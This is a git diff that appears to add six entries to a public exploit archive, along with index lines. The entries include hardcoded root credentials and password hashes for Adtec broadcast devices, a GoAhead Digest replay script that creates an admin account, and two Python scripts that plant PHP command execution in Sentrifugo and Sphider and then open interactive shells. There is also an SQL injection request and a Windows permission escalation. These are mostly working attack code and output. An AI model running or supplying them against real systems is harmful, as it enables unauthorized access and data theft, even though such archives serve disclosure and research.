diff --git a/exploits/hardware/remote/48954.txt b/exploits/hardware/remote/48954.txt new file mode 100644 index 000000000..b03ace479 --- /dev/null +++ b/exploits/hardware/remote/48954.txt @@ -0,0 +1,108 @@ +# Exploit Title: Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root +# Date: 2020-07-24 +# Exploit Author: LiquidWorm +# Software Link: https://www.adtecdigital.com / https://www.adtecdigital.com/support/documents-downloads +# Version: Multiple + +Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root + + +Vendor: Adtec Digital, Inc. +Product web page: https://www.adtecdigital.com + https://www.adtecdigital.com/support/documents-downloads +Affected version: SignEdje Digital Signage Player v2.08.28 + mediaHUB HD-Pro High & Standard Definition MPEG2 Encoder v3.07.19 + afiniti Multi-Carrier Platform v1905_11 + EN-31 Dual Channel DSNG Encoder / Modulator v2.01.15 + EN-210 Multi-CODEC 10-bit Encoder / Modulator v3.00.29 + EN-200 1080p AVC Low Latency Encoder / Modulator v3.00.29 + ED-71 10-bit / 1080p Integrated Receiver Decoder v2.02.24 + edje-5110 Standard Definition MPEG2 Encoder v1.02.05 + edje-4111 HD Digital Media Player v2.07.09 + Soloist HD-Pro Broadcast Decoder v2.07.09 + adManage Traffic & Media Management Application v2.5.4 + +Summary: Adtec Digital is a leading manufacturer of Broadcast, Cable and IPTV products and +solutions. + +Desc: The devices utilizes hard-coded and default credentials within its Linux distribution +image for Web/Telnet/SSH access. A remote attacker could exploit this vulnerability by logging +in using the default credentials for accessing the web interface or gain shell access as root. + +Tested on: GNU/Linux 4.1.8 (armv7l) + GNU/Linux 3.12.38 (PowerPC) + GNU/Linux 2.6.14 (PowerPC) + Adtec Embedded Linux 0.9 (fido) + Apache + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5603 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5603.php + + +24.07.2020 + +-- + + +Creds: +------ + +adtec:none:500:1000:adtec:/media:/bin/sh +admin:1admin!:502:502:admin:/home/admin:/bin/sh +root1:1root!:0:0:root:/root:/bin/sh +adtecftp:adtecftp2231 + + +SSH: +---- + +login as: root +root@192.168.3.12's password: + +Successfully logged in. +Thank you for choosing Adtec Digital products- +we know you had a choice and we appreciate your decision! + +root@targethostname:~# id +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) +-- +admin@targethostname:/$ id +uid=502(admin) gid=502(admin) groups=0(root),502(admin) +admin@targethostname:~$ id adtec +uid=500(adtec) gid=1000(users) groups=1000(users),72(apache) +admin@targethostname:~$ cat /etc/sudoers |grep -v "#" +root ALL=(ALL) ALL +apache ALL=(ALL) NOPASSWD: ALL + + +Telnet (API): +------------- + +Adtec Resident Telnet Server... +UserName: +adtec +adtec +PassWord: +none +User adtec connected +*.SYSD SHELLCMD cat /etc/passwd +*.SYSD CMD cat /etc/passwd +OK +root:he7TRuXjJjxfc:0:0:root:/root:/bin/sh +adtec:GC1BpYa80PaoY:500:1000:adtec:/media:/bin/sh +apache:!!:72:72:Apache Server:/dev/null:/sbin/nologin +fregd:!!:73:73:Freg Daemon:/dev/null:/sbin/nologin +ntp:!!:38:38:NTP Server:/dev/null:/sbin/nologin +syslogd:!!:74:74:Syslog Daemon:/dev/null:/sbin/nologin +admin:rDglOB38TVYRg:502:502:admin:/home/admin:/bin/sh +sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false +avahi:x:82:82:Avahi Daemon:/dev/null/:/sbin/nologin +avahi-autoipd:x:83:83:Avahi Autoipd:/dev/null/:/sbin/nologin +messagebus:x:81:81:Message Bus Daemon:/dev/null:/sbin/nologin +... +... \ No newline at end of file diff --git a/exploits/hardware/remote/48958.py b/exploits/hardware/remote/48958.py new file mode 100755 index 000000000..4b873452c --- /dev/null +++ b/exploits/hardware/remote/48958.py @@ -0,0 +1,108 @@ +# Exploit Title: GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse +# Date: 2019-08-29 +# Exploit Author: LiquidWorm +# Software Link: https://www.embedthis.com +# Version: 5.1.1 + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# +# EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse +# +# +# Vendor: Embedthis Software LLC +# Product web page: https://www.embedthis.com +# Affected version: <=5.1.1 and <=4.1.2 +# Fixed version: >=5.1.2 and >=4.1.3 +# +# Summary: GoAhead is the world's most popular, tiny embedded web server. It is compact, +# secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is +# ideal for the smallest of embedded devices. +# +# Desc: A security vulnerability affecting GoAhead versions 2 to 5 has been identified when +# using Digest authentication over HTTP. The HTTP Digest Authentication in the GoAhead web +# server does not completely protect against replay attacks. This allows an unauthenticated +# remote attacker to bypass authentication via capture-replay if TLS is not used to protect +# the underlying communication channel. Digest authentication uses a "nonce" value to mitigate +# replay attacks. GoAhead versions 3 to 5 validated the nonce with a fixed duration of 5 minutes +# which permitted short-period replays. This duration is too long for most implementations. +# +# Tested on: GoAhead-http +# GoAhead-Webs +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5598 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5598.php +# +# CVE ID: CVE-2020-15688 +# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15688 +# https://nvd.nist.gov/vuln/detail/CVE-2020-15688 +# +# CWE ID: CWE-294 Authentication Bypass by Capture-replay +# CWE URL: https://cwe.mitre.org/data/definitions/294.html +# +# CWE ID: CWE-323: Reusing a Nonce, Key Pair in Encryption +# CWE URL: https://cwe.mitre.org/data/definitions/323.html +# +# GoAhead Security Alerts / Fix: +# https://github.com/embedthis/goahead-gpl/issues/3 +# https://github.com/embedthis/goahead-gpl/issues/2 +# https://github.com/embedthis/goahead-gpl/commit/fe0662f945bd7e24b8d621929e1b93d8a7f3f08f#diff-0988df549d878c849d7f2c073319bcb2 +# +# +# 29.08.2019 +# + + +# +# PoC for a network controller running GoAhead web server. +# Replay Authentication Bypass / Create Admin User +# + +import requests +import sys##### + +if (len(sys.argv) <= 1): + print("Usage: ./nen.py ") + exit(0) + +ip = sys.argv[1] + +url = "http://"+ip+"/goform/formUserManagementAdd?lang=en" +kolache = {"lang":"en"} + +replay = "Digest username=\"admin\", " +replay += "realm=\"GoAhead\", " +replay += "nonce=\"5fb3ce6dec423bf8b8f0dfc8cf65244d\", " +replay += "uri=\"/goform/formUserManagementAdd?lang=en\", " +replay += "algorithm=MD5, " +replay += "response=\"1c05f4d08aa0cfcc5318882e0fb4e9af\", " +replay += "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\", " +replay += "qop=auth, " +replay += "nc=0000000a, " +replay += "cnonce=\"0649f631320f23bb\"" + +headers = {"Cache-Control": "max-age=0", + "Authorization": replay, + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "NoProxy/NoProblem.251", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "mk-MK;q=0.9,mk;q=0.8", + "Connection": "close"} + +data = {"FormSubmitCause": "button", + "DefinitionAction": "add", + "Define_admin_ID": "admin", + "Define_admin_Name": "admin", + "Define________Action________ID": '', + "Define________Action________Name": "testingus", + "Define________Action________Password": "testingus", + "Define________Action________Group": "Administrators"} + +requests.post(url, headers=headers, cookies=kolache, data=data) + +print("Finito") \ No newline at end of file diff --git a/exploits/php/webapps/48955.py b/exploits/php/webapps/48955.py new file mode 100755 index 000000000..03aded8a8 --- /dev/null +++ b/exploits/php/webapps/48955.py @@ -0,0 +1,96 @@ +# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated) +# Date: 26/10/2020 +# Exploit Author: Gurkirat Singh +# Vendor Homepage: http://www.sentrifugo.com/ +# POC Link: https://www.exploit-db.com/exploits/47323 +# Version: 3.2 +# Tested on: Linux and Windows +# CVE : CVE-2019-15813 +# Contact Details: https://google.com/search?q=tbhaxor + +from argparse import ArgumentParser, RawTextHelpFormatter +from bs4 import BeautifulSoup, Tag +from requests.sessions import Session +import tempfile as tmp +import os.path as path +import random +import string +from huepy import * + +parser = ArgumentParser(description="Exploit for CVE-2019-15813", + formatter_class=RawTextHelpFormatter) +parser.add_argument("--target", + "-t", + help="target uri where application is installed", + required=True, + metavar="", + dest="t") +parser.add_argument("--user", + "-u", + help="username to authenticate", + required=True, + metavar="", + dest="u") +parser.add_argument("--password", + "-p", + help="password to authenticate", + required=True, + metavar="", + dest="p") +args = parser.parse_args() + +if args.t.endswith("/"): + args.t = args.t[:-1] + +F = "".join(random.choices(string.ascii_letters, k=13)) + ".php" + +with Session() as http: + print(run("Logging in")) + data = {"username": args.u, "password": args.p} + + r = http.post(args.t + "/index.php/index/loginpopupsave", + data=data, + allow_redirects=False) + + if not (r.headers.get("Location", "").endswith("welcome") + or r.headers.get("Location", "").endswith("welcome/")): + print(bad("Unable to login. Check username / password")) + exit(1) + print(good("Logged in")) + + print(run("Exploiting")) + files = {"myfile": ("shell.php", "")} + + r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files) + if r.status_code != 200: + print(bad("Unable to upload file")) + exit(1) + file_name = r.json()["filedata"]["new_name"] + print(info("Spawning shell")) + + user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, + data={"cmd": "whoami"}) + host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, + data={"cmd": "cat /etc/hostname"}) + shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}" + + while True: + try: + cmd = input(shell) + if cmd == "exit": break + r = http.post(args.t + "/public/uploads/policy_doc_temp/" + + file_name, + data={"cmd": cmd}) + print(r.content.decode().strip()) + except Exception as e: + print() + break + + print(run("Cleaning")) + http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, + data={"cmd": "rm %s" % file_name}) + r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name) + if r.status_code == 404: + print(good("Cleaned")) + else: + print(bad("Unable to clean the file")) \ No newline at end of file diff --git a/exploits/php/webapps/48956.txt b/exploits/php/webapps/48956.txt new file mode 100644 index 000000000..90b067768 --- /dev/null +++ b/exploits/php/webapps/48956.txt @@ -0,0 +1,37 @@ +# Exploit Title: Client Management System 1.0 - 'searchdata' SQL injection +# Date: 26/10/2020 +# Exploit Author: Serkan Sancar +# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841 +# Version: 1.0 +# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3 + +Step 1: Open the URL http://localhost/clientms/client/index.php + +Step 2: Login to client user on panel + +Step 3: use check sql injection payload 1' or 1=1# in searchbox field + +Malicious Request on burp suite + +POST /clientms/client/search-invoices.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/clientms/client/search-invoices.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 210 +Origin: http://localhost +Connection: close +Cookie: PHPSESSID=q38d8f3sveqjciu02csdfem453 +Upgrade-Insecure-Requests: 1 + +searchdata=1%27+or+1%3D1%23&search= + +Step 4: You will list all invoices and you will had checked sql injection on The Panel. + +Example other method: +you saved to inspected package on burp suite. you can exploitation more easily with use sqlmap -r parameter. +sqlmap -r cms.txt --risk=1 --level=1 --dbms=mysql --dbs \ No newline at end of file diff --git a/exploits/php/webapps/48957.py b/exploits/php/webapps/48957.py new file mode 100755 index 000000000..f59b996e5 --- /dev/null +++ b/exploits/php/webapps/48957.py @@ -0,0 +1,141 @@ +# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated) +# Google Dork: intitle:"Sphider Admin Login" +# Date: 2014-07-28 +# Exploit Author: Gurkirat Singh +# Vendor Homepage: http://www.sphider.eu/ +# Software Link: http://www.sphider.eu/sphider-1.3.6.zip +# Version: v1.3.6 +# Tested on: Windows and Linux +# CVE : CVE-2014-5194 +# Proof of Concept: https://www.exploit-db.com/exploits/34189 + +from argparse import ArgumentParser, RawTextHelpFormatter +from huepy import * +import string +import random +from bs4 import BeautifulSoup, Tag +from requests import Session +from randua import generate as randua + +_F = "".join(random.choices(string.ascii_letters, k=13)) + +parser = ArgumentParser(description="Exploit for CVE-2014-5194", + formatter_class=RawTextHelpFormatter) +parser.add_argument("--target", + "-t", + help="target uri where application is installed", + required=True, + metavar="", + dest="t") +parser.add_argument("--user", + "-u", + help="username to authenticate", + required=True, + metavar="", + dest="u") +parser.add_argument("--password", + "-p", + help="password to authenticate", + required=True, + metavar="", + dest="p") +parser.add_argument("--debug", + help="if passed, spawn the firefox window", + default=True, + action="store_false") +parser.add_argument("--timeout", + help="timeout in seconds (default: 1)", + dest="T", + metavar="", + default=1) +args = parser.parse_args() + +if args.t.endswith("/"): + args.t = args.t[:-1] + +print(run("Logging in")) + +with Session() as http: + data = {"user": args.u, "pass": args.p} + + headers = {"User-Agent": randua()} + http.post(args.t + '/admin/auth.php', + data=data, + headers=headers, + allow_redirects=False) + r = http.get(args.t + '/admin/admin.php', + headers=headers, + allow_redirects=False) + html = BeautifulSoup(r.content.decode(), "lxml") + title: Tag = html.find("title") + + if title.text == "Sphider Admin Login": + print(bad("Failed to login")) + exit(1) + else: + print(good("Logged in")) + + payload = { + 'f': 'settings', + 'Submit': '1', + '_version_nr': '1.3.5', + '_language': 'en', + '_template': 'standard', + '_admin_email': 'admin@localhost', + '_print_results': '1', + '_tmp_dir': 'tmp', + '_log_dir': 'log', + '_log_format': 'html', + '_min_words_per_page': '10', + '_min_word_length': '3', + '_word_upper_bound': '100;system($_POST[cmd])', + '_index_numbers': '1', + '_index_meta_keywords': '1', + '_pdftotext_path': 'c:\\temp\\pdftotext.exe', + '_catdoc_path': 'c:\\temp\\catdoc.exe', + '_xls2csv_path': 'c:\\temp\\xls2csv', + '_catppt_path': 'c:\\temp\\catppt', + '_user_agent': 'Sphider', + '_min_delay': '0', + '_strip_sessids': '1', + '_results_per_page': '10', + '_cat_columns': '2', + '_bound_search_result': '0', + '_length_of_link_desc': '0', + '_links_to_next': '9', + '_show_meta_description': '1', + '_show_query_scores': '1', + '_show_categories': '1', + '_desc_length': '250', + '_did_you_mean_enabled': '1', + '_suggest_enabled': '1', + '_suggest_history': '1', + '_suggest_rows': '10', + '_title_weight': '20', + '_domain_weight': '60', + '_path_weight': '10', + '_meta_weight': '5' + } + + print(run("Exploiting")) + http.post(args.t + "/admin/admin.php", data=payload) + r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F}) + if r.content.decode().strip() != _F: + print(bad("Failed")) + exit(1) + print(good("Exploited")) + print(info("Spawning Shell")) + user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"}) + host = http.post(args.t + "/settings/conf.php", + data={"cmd": "cat /etc/hostname"}) + shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}" + + while True: + try: + cmd = input(shell) + if cmd == "exit": break + r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd}) + print(r.content.decode().strip()) + except: + break + print() \ No newline at end of file diff --git a/exploits/windows/local/48953.txt b/exploits/windows/local/48953.txt new file mode 100644 index 000000000..305b4bbcd --- /dev/null +++ b/exploits/windows/local/48953.txt @@ -0,0 +1,62 @@ +# Exploit Title: TDM Digital Signage PC Player 4.1 - Insecure File Permissions +# Date: 2020-09-23 +# Exploit Author: LiquidWorm +# Software Link: https://www.tdmsignage.com / https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y +# Version: 4.1.0.4 + +Vendor: TDM [Trending Digital Marketing] +Product web page: https://www.tdmsignage.com + https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y +Affected version: 4.1.0.4 + +Summary: With TDM you can do a lot more than just show Digital Signage. +With our Enterprise-Grade software you open the door to Interactive Signage, +Analytics, Proof of Play and a lot more. + +Desc: TDM Digital Signage Windows Player suffers from an elevation of +privileges vulnerability which can be used by a simple authenticated +user that can change the executable file with a binary of choice. The +vulnerability exist due to the improper permissions, with the 'M' flag +(Modify) or 'C' flag (Change) for 'Authenticated Users' group. + +Tested on: Microsoft Windows 10 Home + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5604 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5604.php + +23.09.2020 + +-- + + +C:\>icacls TDMSignage +TDMSignage BUILTIN\Administrators:(I)(OI)(CI)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) + BUILTIN\Users:(I)(OI)(CI)(RX) + NT AUTHORITY\Authenticated Users:(I)(M) <---------<<< + NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) <---------<<< + +Successfully processed 1 files; Failed processing 0 files + +C:\TDMSignage>dir /b *.exe +Player.exe +unins000.exe + +C:\TDMSignage>icacls Player.exe && icacls unins000.exe +Player.exe BUILTIN\Administrators:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Users:(I)(RX) + NT AUTHORITY\Authenticated Users:(I)(M) <---------<<< + +Successfully processed 1 files; Failed processing 0 files +unins000.exe BUILTIN\Administrators:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Users:(I)(RX) + NT AUTHORITY\Authenticated Users:(I)(M) <---------<<< + +Successfully processed 1 files; Failed processing 0 files \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a52917905..3732c47c7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10389,6 +10389,7 @@ id,file,description,date,author,type,platform,port 48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows, 48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows, 48876,exploits/windows/local/48876.txt,"Guild Wars 2 - Insecure Folder Permissions",2020-10-14,"George Tsimpidas",local,windows, +48953,exploits/windows/local/48953.txt,"TDM Digital Signage PC Player 4.1 - Insecure File Permissions",2020-10-27,LiquidWorm,local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, @@ -17825,6 +17826,8 @@ id,file,description,date,author,type,platform,port 42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858 48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows, 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware, +48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware, +48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware, 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java, 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware, 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows, @@ -40764,13 +40767,16 @@ id,file,description,date,author,type,platform,port 48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php, 48944,exploits/php/webapps/48944.py,"CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection",2020-10-26,"Gurkirat Singh",webapps,php, 48945,exploits/php/webapps/48945.txt,"Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-26,"Akıner Kısa",webapps,php, -48946,exploits/php/webapps/48946.py,"InoERP 0.7.2 - Remote Code Execution (Unauthenticated)",2020-10-26,"Simon Lyhin",webapps,php, +48946,exploits/php/webapps/48946.py,"InoERP 0.7.2 - Remote Code Execution (Unauthenticated)",2020-10-26,"Lyhin\'s Lab",webapps,php, 48947,exploits/php/webapps/48947.txt,"PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS)",2020-10-26,"David Bimmel",webapps,php, 48948,exploits/hardware/webapps/48948.txt,"Genexis Platinum-4410 - 'SSID' Persistent XSS",2020-10-26,"Amal Mohandas",webapps,hardware, 48949,exploits/hardware/webapps/48949.txt,"ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure",2020-10-26,LiquidWorm,webapps,hardware, 48950,exploits/hardware/webapps/48950.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure",2020-10-26,LiquidWorm,webapps,hardware, 48951,exploits/hardware/webapps/48951.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service",2020-10-26,LiquidWorm,webapps,hardware, 48952,exploits/hardware/webapps/48952.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)",2020-10-26,LiquidWorm,webapps,hardware, +48955,exploits/php/webapps/48955.py,"Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)",2020-10-27,"Gurkirat Singh",webapps,php, +48956,exploits/php/webapps/48956.txt,"Client Management System 1.0 - 'searchdata' SQL injection",2020-10-27,"Serkan Sancar",webapps,php, +48957,exploits/php/webapps/48957.py,"Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)",2020-10-27,"Gurkirat Singh",webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,